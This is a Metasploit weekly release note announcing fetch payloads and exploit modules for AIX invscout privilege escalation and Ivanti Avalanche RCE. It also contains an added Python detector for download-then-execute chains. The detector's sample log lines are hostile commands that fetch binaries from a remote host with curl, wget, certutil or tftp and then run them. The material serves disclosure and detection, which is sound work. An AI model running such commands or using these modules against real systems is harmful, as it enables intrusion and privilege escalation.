This week we're releasing Metasploit fetch payloads. Fetch payloads are command-based payloads that leverage network-enabled applications on remote hosts and different protocol servers to serve, download, and execute binary payloads. Over the last year, two thirds of the exploit modules landed in Metasploit Framework were command injection exploits. These exploits will be much easier to write with our new payloads. You can check out the documentation here, and we'll have a longer blog post on the feature out soon.
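From the defender's side, a fetch payload leaves a recognisable trace: one process fetches a file with a network client and a later command in the same chain makes it executable or runs it. The following added example (not Metasploit code) flags that download-then-execute pattern in constructed process-creation log lines; the log format, the tool list and the sample commands are assumptions for the demonstration.

```python
import os
import re
import shlex
from typing import Dict, List, Optional

# Network-enabled clients a fetch-style payload may lean on to pull a binary.
# Assumption: a common set of such clients, not taken from Metasploit's payload definitions.
FETCH_TOOLS = {"curl", "wget", "certutil", "tftp", "ftp"}
LOG_RE = re.compile(r"^(?P<ts>\S+) pid=(?P<pid>\d+) cmd=(?P<cmd>.*)$")
SEP_RE = re.compile(r"\s*(?:\|\||&&|[;&|])\s*")          # shell command separators
IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")  # bare host[:port] argument

# Constructed sample process-creation log lines (not real telemetry).
SAMPLE_LOGS = [
    "2023-05-12T10:01:02Z pid=4411 cmd=curl -so /tmp/.x http://10.0.0.5:8080/a ; chmod +x /tmp/.x ; /tmp/.x &",
    "2023-05-12T10:01:09Z pid=4420 cmd=wget -q http://10.0.0.5/b -O /dev/shm/b ; sh /dev/shm/b",
    "2023-05-12T10:02:00Z pid=4430 cmd=curl -s https://example.com/api/status",
    "2023-05-12T10:02:30Z pid=4440 cmd=certutil -urlcache -f http://10.0.0.5/c.exe c.exe & c.exe",
    "2023-05-12T10:03:00Z pid=4450 cmd=tftp -g -r d 10.0.0.5 ; chmod 755 d ; ./d",
]

def fetch_artifacts(tokens: List[str]) -> List[str]:
    """Arguments of a fetch command that look like the local file being written:
    everything except the tool name, flags, URLs and bare host addresses."""
    return [t for t in tokens[1:]
            if not t.startswith("-") and "://" not in t and not IP_RE.match(t)]

def references(tokens: List[str], artifact: str) -> bool:
    """True if a later command names the fetched file (e.g. chmod +x, sh, ./file)."""
    base = os.path.basename(artifact)
    return bool(base) and any(os.path.basename(t) == base for t in tokens)

def analyze_command(cmd: str) -> Optional[Dict[str, str]]:
    """Return the first fetch-then-use chain found in one command line, else None."""
    segments = [shlex.split(s) for s in SEP_RE.split(cmd) if s.strip()]
    for i, seg in enumerate(segments):
        if not seg or os.path.basename(seg[0]) not in FETCH_TOOLS:
            continue
        for artifact in fetch_artifacts(seg):
            later = [s for s in segments[i + 1:] if references(s, artifact)]
            if later:
                return {"tool": seg[0], "artifact": artifact, "follow_up": " ".join(later[0])}
    return None

def find_fetch_and_execute(lines: List[str]) -> List[Dict[str, str]]:
    """Scan log lines and return one hit per line that shows a fetch-then-use chain."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        hit = analyze_command(m["cmd"]) if m else None
        if hit:
            hits.append({"pid": m["pid"], **hit})
    return hits

if __name__ == "__main__":
    for h in find_fetch_and_execute(SAMPLE_LOGS):
        print(f"pid {h['pid']}: {h['tool']} wrote {h['artifact']}, then: {h['follow_up']}")
```

A plain API call with no output file (the third sample line) is not flagged, which keeps the rule focused on the download-and-execute chain rather than on every use of curl.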
invscout RPM
AIX systems up to and including 7.2 were vulnerable to a command injection in the invscout utility. Tim Brown and bcoles created a new module to take advantage of this, giving privilege escalation to root on these systems. This addresses CVE-2023-28528. It's available for Framework users now at use exploit/aix/local/invscout_rpm_priv_esc.
invscout RPM Privilege Escalation
Authors: Tim Brown and bcoles
Type: Exploit
Pull request: #17993 contributed by bcoles
AttackerKB reference: CVE-2023-28528
Description: This module leverages a command injection vulnerability in the setuid invscout utility on AIX systems 7.2 and prior to achieve effective-uid root privileges.
Authors: Piotr Bazydlo and Shelby Pace
Type: Exploit
Pull request: #17979 contributed by space-r7
CVE reference: ZDI-23-456
Description: An exploit has been added for CVE-2023-28128, an authenticated file upload vulnerability in versions below v6.4.0.186 of Ivanti Avalanche that allows authenticated administrators to change the default path to the web root of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\SYSTEM. This occurs due to Ivanti Avalanche not properly validating MS-DOS style short names in the configuration path.
Author: Brendan Watters
Type: Payload
Pull request: #17782 contributed by bwatters-r7
Description: This adds a set of command payloads that facilitate fetching and executing a payload file from Metasploit.
post/windows/manage/sticky_keys module.
exploits/aix/local/ibstat_path.
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).